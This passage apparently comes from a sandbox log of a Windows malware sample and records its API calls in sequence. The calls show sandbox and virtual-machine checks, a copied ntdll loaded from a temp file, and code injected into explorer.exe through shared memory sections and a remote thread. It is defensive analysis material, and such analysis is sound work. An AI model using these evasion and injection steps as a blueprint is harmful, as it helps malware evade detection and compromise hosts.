returned 1 [0135.952] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.953] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0135.953] VirtualProtect (in: lpAddress=0x401000, dwSize=0x83d1, flNewProtect=0x40, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0135.957] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="kernel32" | out: DestinationString="kernel32") [0135.957] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x76c20000) returned 0x0 [0135.958] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="user32" | out: DestinationString="user32") [0135.958] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74f40000) returned 0x0 [0135.958] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="advapi32" | out: DestinationString="advapi32") [0135.958] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74d40000) returned 0x0 [0135.958] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="shell32" | out: DestinationString="shell32") [0135.958] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x75fd0000) returned 0x0 [0135.958] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0135.959] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x30e9f0 [0135.959] GetKeyboardLayoutList (in: nBuff=1, lpList=0x30e9f0 | out: lpList=0x30e9f0) returned 1 [0135.960] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18e920 | out: TokenHandle=0x18e920*=0x124) returned 1 [0135.960] GetTokenInformation (in: TokenHandle=0x124, TokenInformationClass=0x19, TokenInformation=0x18e924, TokenInformationLength=0x14, ReturnLength=0x18e91c | out: TokenInformation=0x18e924, ReturnLength=0x18e91c) returned 1 [0135.960] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x18eb60 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0135.960] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0xd5a0f3e9, lpTempFileName=0x18eb60 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 0xf3e9 [0135.963] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 1 [0135.979] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18e958, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0135.979] CopyFileW (lpExistingFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp"), bFailIfExists=0) returned 1 [0136.082] RtlInitUnicodeString (in: DestinationString=0x18e930, SourceString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" | out: DestinationString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp") [0136.082] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp", BaseAddress=0x18e938 | out: BaseAddress=0x18e938*=0x73ae0000) returned 0x0 [0136.191] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18eb64, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0136.192] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ed60, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ed60, ResultLength=0x0) returned 0x0 [0136.192] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ed68, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ed68, ReturnLength=0x0) returned 0x0 [0136.192] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0136.192] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x3151b8 [0136.192] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0136.192] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0136.192] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x12c) returned 0x0 [0136.193] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.193] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x30d718 [0136.193] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x30d718, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x30d718, ResultLength=0x18ed5c) returned 0x0 [0136.193] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.193] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x311680 [0136.193] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.193] LocalFree (hMem=0x311680) returned 0x0 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.194] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x311680 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.194] LocalFree (hMem=0x311680) returned 0x0 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.194] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x311680 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.194] LocalFree (hMem=0x311680) returned 0x0 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.194] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x311680 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.194] LocalFree (hMem=0x311680) returned 0x0 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.194] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x311680 [0136.194] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x7a, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.194] LocalFree (hMem=0x311680) returned 0x0 [0136.194] LocalFree (hMem=0x30d718) returned 0x0 [0136.194] NtClose (Handle=0x12c) returned 0x0 [0136.194] LocalFree (hMem=0x3151b8) returned 0x0 [0136.194] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x3151b8 [0136.194] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0136.194] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0136.194] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x12c) returned 0x0 [0136.194] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.195] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x30d718 [0136.195] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x30d718, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x30d718, ResultLength=0x18ed5c) returned 0x0 [0136.195] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0136.195] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x311680 [0136.195] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x311680, Length=0x50, ResultLength=0x18ed5c | out: KeyInformation=0x311680, ResultLength=0x18ed5c) returned 0x0 [0136.195] LocalFree (hMem=0x311680) returned 0x0 [0136.195] LocalFree (hMem=0x30d718) returned 0x0 [0136.195] NtClose (Handle=0x12c) returned 0x0 [0136.195] LocalFree (hMem=0x3151b8) returned 0x0 [0136.195] Sleep (dwMilliseconds=0x1388) [0141.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ed30*=0x0, ZeroBits=0x0, RegionSize=0x18ed34*=0x2d870, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ed30*=0x1e0000, RegionSize=0x18ed34*=0x2e000) returned 0x0 [0141.191] GetShellWindow () returned 0x600a0 [0141.191] GetWindowThreadProcessId (in: hWnd=0x600a0, lpdwProcessId=0x18ecdc | out: lpdwProcessId=0x18ecdc) returned 0xbe0 [0141.191] NtOpenProcess (in: ProcessHandle=0x18ed2c, DesiredAccess=0x40, ObjectAttributes=0x18ed14*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ed0c*(UniqueProcess=0xbdc, UniqueThread=0x0) | out: ProcessHandle=0x18ed2c*=0x12c) returned 0x0 [0141.192] NtDuplicateObject (in: SourceProcessHandle=0x12c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ed30, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ed30*=0x128) returned 0x0 [0141.192] NtCreateSection (in: SectionHandle=0x18ece8, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece8*=0x130) returned 0x0 [0141.192] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0xffffffff, BaseAddress=0x18ecf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf8*=0x2d0000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0141.192] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0x128, BaseAddress=0x18ed00*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ed00*=0x54c0000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0141.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d0000, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0141.197] NtCreateSection (in: SectionHandle=0x18ece4, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece4*=0x134) returned 0x0 [0141.197] NtMapViewOfSection (in: SectionHandle=0x134, ProcessHandle=0xffffffff, BaseAddress=0x18ecf4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x15600, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf4*=0x3450000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0141.197] NtMapViewOfSection (in: SectionHandle=0x134, ProcessHandle=0x128, BaseAddress=0x18ecfc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18ecfc*=0x5560000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0141.199] RtlCreateUserThread (in: ProcessHandle=0x128, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x5561a48, Parameter=0x54c0000, ThreadHandle=0x18ec40*=0x7739b17077166c9a, ClientId=0x0 | out: ThreadHandle=0x18ec40*=0x138, ClientId=0x0) returned 0x0 [0141.200] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 149 os_tid = 0x40c Process: id = "11" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x6561c000" os_pid = "0xbdc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "10" os_parent_pid = "0x83c" cmd_line = "explorer.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0x810 Thread: id = 159 os_tid = 0x814 Thread: id = 160 os_tid = 0x81c Thread: id = 161 os_tid = 0x820 Thread: id = 162 os_tid = 0x8b8 Thread: id = 163 os_tid = 0x824 Thread: id = 164 os_tid = 0x804 Thread: id = 165 os_tid = 0x6ec Thread: id = 166 os_tid = 0x828 Thread: id = 167 os_tid = 0x7c8 Thread: id = 168 os_tid = 0x8a0 Thread: id = 169 os_tid = 0x410 Thread: id = 170 os_tid = 0x860 Thread: id = 171 os_tid = 0x86c Thread: id = 172 os_tid = 0x874 Thread: id = 173 os_tid = 0x87c Thread: id = 174 os_tid = 0x880 Thread: id = 175 os_tid = 0x878 Thread: id = 176 os_tid = 0x840 Thread: id = 177 os_tid = 0x854 Thread: id = 178 os_tid = 0x6d0 Thread: id = 179 os_tid = 0x534 Thread: id = 180 os_tid = 0x834 Thread: id = 181 os_tid = 0xbfc Thread: id = 182 os_tid = 0xbf8 Thread: id = 183 os_tid = 0xbf4 Thread: id = 184 os_tid = 0xbf0 Thread: id = 185 os_tid = 0xbec Thread: id = 186 os_tid = 0xbe4 Thread: id = 187 os_tid = 0xbe0 Thread: id = 188 os_tid = 0x8d8 [0141.230] LoadLibraryA (lpLibFileName="NTDLL") returned 0x76f50000 [0141.231] GetProcAddress (hModule=0x76f50000, lpProcName="RtlExitUserThread") returned 0x76f96930 [0141.233] GetProcessHeap () returned 0x210000 [0141.233] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x2c40ec0 [0141.233] LoadLibraryA (lpLibFileName="user32") returned 0x76d30000 [0141.233] GetProcessHeap () returned 0x210000 [0141.233] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.233] GetProcessHeap () returned 0x210000 [0141.233] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x12) returned 0x2c40ec0 [0141.233] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefdbf0000 [0141.234] GetProcessHeap () returned 0x210000 [0141.234] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.234] GetProcessHeap () returned 0x210000 [0141.234] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x2c40ec0 [0141.234] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefd4b0000 [0141.234] GetProcessHeap () returned 0x210000 [0141.234] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.234] GetProcessHeap () returned 0x210000 [0141.234] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xf) returned 0x2c40ec0 [0141.234] LoadLibraryA (lpLibFileName="ole32") returned 0x7fefe2b0000 [0141.235] GetProcessHeap () returned 0x210000 [0141.235] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.235] GetProcessHeap () returned 0x210000 [0141.235] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x11) returned 0x2c40ec0 [0141.235] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef7150000 [0141.235] GetProcessHeap () returned 0x210000 [0141.235] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.236] GetProcessHeap () returned 0x210000 [0141.236] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x2c40ec0 [0141.236] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7fefe260000 [0141.236] GetProcessHeap () returned 0x210000 [0141.236] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.236] GetProcessHeap () returned 0x210000 [0141.236] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x2c40ec0 [0141.236] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefc5b0000 [0141.244] GetProcessHeap () returned 0x210000 [0141.244] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.244] GetProcessHeap () returned 0x210000 [0141.244] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x11) returned 0x2c40ec0 [0141.244] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefe4c0000 [0141.244] GetProcessHeap () returned 0x210000 [0141.244] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c40ec0) returned 1 [0141.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5563f2c, lpParameter=0x54c0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa6c [0141.246] CloseHandle (hObject=0xa6c) returned 1 [0141.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5564008, lpParameter=0x54c0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa6c [0141.247] CloseHandle (hObject=0xa6c) returned 1 [0141.247] Sleep (dwMilliseconds=0xa) [0141.251] Sleep (dwMilliseconds=0xa) [0141.266] Sleep (dwMilliseconds=0xa) [0141.288] Sleep (dwMilliseconds=0xa) [0141.298] Sleep (dwMilliseconds=0xa) [0141.313] Sleep (dwMilliseconds=0xa) [0141.329] Sleep (dwMilliseconds=0xa) [0141.344] Sleep (dwMilliseconds=0xa) [0141.360] Sleep (dwMilliseconds=0xa) [0141.376] Sleep (dwMilliseconds=0xa) [0141.397] Sleep (dwMilliseconds=0xa) [0141.407] Sleep (dwMilliseconds=0xa) [0141.422] Sleep (dwMilliseconds=0xa) [0141.438] Sleep (dwMilliseconds=0xa) [0141.454] Sleep (dwMilliseconds=0xa) [0141.470] Sleep (dwMilliseconds=0xa) [0141.485] Sleep (dwMilliseconds=0xa) [0141.503] Sleep (dwMilliseconds=0xa) [0141.516] Sleep (dwMilliseconds=0xa) [0141.541] Sleep (dwMilliseconds=0xa) [0141.547] Sleep (dwMilliseconds=0xa) [0141.565] Sleep (dwMilliseconds=0xa) [0141.579] Sleep (dwMilliseconds=0xa) [0141.594] Sleep (dwMilliseconds=0xa) [0141.610] Sleep (dwMilliseconds=0xa) [0141.625] Sleep (dwMilliseconds=0xa) [0141.641] Sleep (dwMilliseconds=0xa) [0141.657] Sleep (dwMilliseconds=0xa) [0141.672] Sleep (dwMilliseconds=0xa) [0141.688] Sleep (dwMilliseconds=0xa) [0141.703] Sleep (dwMilliseconds=0xa) [0141.719] Sleep (dwMilliseconds=0xa) [0141.734] Sleep (dwMilliseconds=0xa) [0141.750] Sleep (dwMilliseconds=0xa) [0141.766] Sleep (dwMilliseconds=0xa) [0141.781] Sleep (dwMilliseconds=0xa) [0141.797] Sleep (dwMilliseconds=0xa) [0141.812] Sleep (dwMilliseconds=0xa) [0141.828] Sleep (dwMilliseconds=0xa) [0141.844] Sleep (dwMilliseconds=0xa) [0141.859] Sleep (dwMilliseconds=0xa) [0141.875] Sleep (dwMilliseconds=0xa) [0141.891] Sleep (dwMilliseconds=0xa) [0141.906] Sleep (dwMilliseconds=0xa) [0141.922] Sleep (dwMilliseconds=0xa) [0141.938] Sleep (dwMilliseconds=0xa) [0141.955] Sleep (dwMilliseconds=0xa) [0141.969] Sleep (dwMilliseconds=0xa) [0141.984] Sleep (dwMilliseconds=0xa) [0142.000] Sleep (dwMilliseconds=0xa) [0142.016] Sleep (dwMilliseconds=0xa) [0142.031] Sleep (dwMilliseconds=0xa) [0142.047] Sleep (dwMilliseconds=0xa) [0142.062] Sleep (dwMilliseconds=0xa) [0142.078] Sleep (dwMilliseconds=0xa) [0142.093] Sleep (dwMilliseconds=0xa) [0142.109] Sleep (dwMilliseconds=0xa) [0142.125] Sleep (dwMilliseconds=0xa) [0142.140] Sleep (dwMilliseconds=0xa) [0142.156] Sleep (dwMilliseconds=0xa) [0142.171] Sleep (dwMilliseconds=0xa) [0142.187] Sleep (dwMilliseconds=0xa) [0142.203] Sleep (dwMilliseconds=0xa) [0142.218] Sleep (dwMilliseconds=0xa) [0142.234] Sleep (dwMilliseconds=0xa) [0142.249] Sleep (dwMilliseconds=0xa) [0142.265] Sleep (dwMilliseconds=0xa) [0142.281] Sleep (dwMilliseconds=0xa) [0142.296] Sleep (dwMilliseconds=0xa) [0142.312] Sleep (dwMilliseconds=0xa) [0142.327] Sleep (dwMilliseconds=0xa) [0142.343] Sleep (dwMilliseconds=0xa) [0142.359] Sleep (dwMilliseconds=0xa) [0142.374] Sleep (dwMilliseconds=0xa) [0142.390] Sleep (dwMilliseconds=0xa) [0142.405] Sleep (dwMilliseconds=0xa) [0142.421] Sleep (dwMilliseconds=0xa) [0142.437] Sleep (dwMilliseconds=0xa) [0142.452] Sleep (dwMilliseconds=0xa) [0142.468] Sleep (dwMilliseconds=0xa) [0142.484] Sleep (dwMilliseconds=0xa) [0142.499] Sleep (dwMilliseconds=0xa) [0142.515] Sleep (dwMilliseconds=0xa) [0142.539] Sleep (dwMilliseconds=0xa) [0142.546] Sleep (dwMilliseconds=0xa) [0142.561] Sleep (dwMilliseconds=0xa) [0142.580] Sleep (dwMilliseconds=0xa) [0142.593] Sleep (dwMilliseconds=0xa) [0142.608] Sleep (dwMilliseconds=0xa) [0142.624] Sleep (dwMilliseconds=0xa) [0142.639] Sleep (dwMilliseconds=0xa) [0142.655] Sleep (dwMilliseconds=0xa) [0142.671] Sleep (dwMilliseconds=0xa) [0142.686] Sleep (dwMilliseconds=0xa) [0142.702] Sleep (dwMilliseconds=0xa) [0142.717] Sleep (dwMilliseconds=0xa) [0142.733] Sleep (dwMilliseconds=0xa) [0142.749] Sleep (dwMilliseconds=0xa) [0142.764] Sleep (dwMilliseconds=0xa) [0142.782] Sleep (dwMilliseconds=0xa) [0142.795] Sleep (dwMilliseconds=0xa) [0142.820] Sleep (dwMilliseconds=0xa) [0142.827] Sleep (dwMilliseconds=0xa) [0142.842] Sleep (dwMilliseconds=0xa) [0142.858] Sleep (dwMilliseconds=0xa) [0142.873] Sleep (dwMilliseconds=0xa) [0142.889] Sleep (dwMilliseconds=0xa) [0142.904] Sleep (dwMilliseconds=0xa) [0142.925] Sleep (dwMilliseconds=0xa) [0142.949] Sleep (dwMilliseconds=0xa) [0142.951] Sleep (dwMilliseconds=0xa) [0142.967] Sleep (dwMilliseconds=0xa) [0142.987] Sleep (dwMilliseconds=0xa) [0142.998] Sleep (dwMilliseconds=0xa) [0143.014] Sleep (dwMilliseconds=0xa) [0143.030] Sleep (dwMilliseconds=0xa) [0143.045] Sleep (dwMilliseconds=0xa) [0143.071] Sleep (dwMilliseconds=0xa) [0143.079] Sleep (dwMilliseconds=0xa) [0143.092] Sleep (dwMilliseconds=0xa) [0143.109] Sleep (dwMilliseconds=0xa) [0143.123] Sleep (dwMilliseconds=0xa) [0143.139] Sleep (dwMilliseconds=0xa) [0143.154] Sleep (dwMilliseconds=0xa) [0143.170] Sleep (dwMilliseconds=0xa) [0143.194] Sleep (dwMilliseconds=0xa) [0143.201] Sleep (dwMilliseconds=0xa) [0143.216] Sleep (dwMilliseconds=0xa) [0143.232] Sleep (dwMilliseconds=0xa) [0143.248] Sleep (dwMilliseconds=0xa) [0143.263] Sleep (dwMilliseconds=0xa) [0143.279] Sleep (dwMilliseconds=0xa) [0143.295] Sleep (dwMilliseconds=0xa) [0143.319] Sleep (dwMilliseconds=0xa) [0143.326] Sleep (dwMilliseconds=0xa) [0143.341] Sleep (dwMilliseconds=0xa) [0143.357] Sleep (dwMilliseconds=0xa) [0143.373] Sleep (dwMilliseconds=0xa) [0143.390] Sleep (dwMilliseconds=0xa) [0143.405] Sleep (dwMilliseconds=0xa) [0143.419] Sleep (dwMilliseconds=0xa) [0143.443] Sleep (dwMilliseconds=0xa) [0143.451] Sleep (dwMilliseconds=0xa) [0143.467] Sleep (dwMilliseconds=0xa) [0143.482] Sleep (dwMilliseconds=0xa) [0143.498] Sleep (dwMilliseconds=0xa) [0143.513] Sleep (dwMilliseconds=0xa) [0143.537] Sleep (dwMilliseconds=0xa) [0143.544] Sleep (dwMilliseconds=0xa) [0143.567] Sleep (dwMilliseconds=0xa) [0143.585] Sleep (dwMilliseconds=0xa) [0143.591] Sleep (dwMilliseconds=0xa) [0143.607] Sleep (dwMilliseconds=0xa) [0143.622] 